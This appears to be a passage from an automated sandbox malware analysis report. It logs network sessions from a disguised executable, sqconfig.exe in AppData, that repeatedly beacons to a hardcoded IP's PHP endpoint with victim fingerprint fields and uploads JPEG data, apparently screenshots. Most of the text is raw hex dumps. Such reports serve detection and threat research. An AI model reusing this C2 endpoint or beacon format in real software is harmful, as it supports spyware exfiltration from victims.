                                                                  Sep 30, 2021 23:53:16.284316063 CEST15159OUTData Raw: f1 fa e0 c4 e6 34 b0 f2 e5 9a 7f 2b 7f 99 bd 2c 2c ea ab a6 8f 9c 29 45 7d 20 bf 0b bc 18 7a e8 df f9 35 37 ff 00 17 5c ff 00 8f fe 1f f8 5f 44 f0 3e a3 a8 e9 da 67 91 77 0f 97 b2 4f b4 4a d8 cc 8a a7 86 62 3a 13 59 52 ce 28 54 9a 82 4e ed db a7
                                                                  Data Ascii: 4+,,)E} z57\_D>gwOJb:YR(TN<HQ)Ez RRQEb4G{+ff-NV?+#yFkCLM2YarAi]t(~nZ_VQ\k&TZWGRR-bJi))J:!
                                                                  Sep 30, 2021 23:53:16.464131117 CEST15176INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  79192.168.2.34988791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:16.192995071 CEST15129OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:16.409733057 CEST15176INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.34976791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:51.796936035 CEST7277OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:52.001064062 CEST7324INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  80192.168.2.34988891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:16.644432068 CEST15177OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:16.822144985 CEST15191INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  81192.168.2.34988991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:16.791383028 CEST15178OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:16.791496038 CEST15178OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:16.791661024 CEST15188OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:16.791798115 CEST15191OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:16.914495945 CEST15196OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:16.914635897 CEST15204OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:16.914659977 CEST15207OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:16.914889097 CEST15211OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:16.914912939 CEST15216OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:17.034214020 CEST15219OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:17.034267902 CEST15222OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:17.231503963 CEST15265INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  82192.168.2.34989091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:17.067683935 CEST15265OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:17.258431911 CEST15266INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  83192.168.2.34989191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:17.514520884 CEST15267OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:17.752415895 CEST15306INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  84192.168.2.34989291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:17.546015024 CEST15267OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:17.546155930 CEST15267OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:17.546365023 CEST15277OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:17.546431065 CEST15280OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:17.674266100 CEST15283OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:17.674354076 CEST15286OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:17.674377918 CEST15288OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:17.674396992 CEST15291OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:17.674443007 CEST15296OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:17.674484015 CEST15299OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:17.674509048 CEST15300OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:17.976710081 CEST15354INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  85192.168.2.34989391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:18.010989904 CEST15355OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:18.199497938 CEST15355INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  86192.168.2.34989491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:18.313915014 CEST15356OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:18.314109087 CEST15356OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:18.314299107 CEST15366OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:18.314425945 CEST15369OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:18.449815989 CEST15378OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:18.450304031 CEST15390OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:18.450359106 CEST15395OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
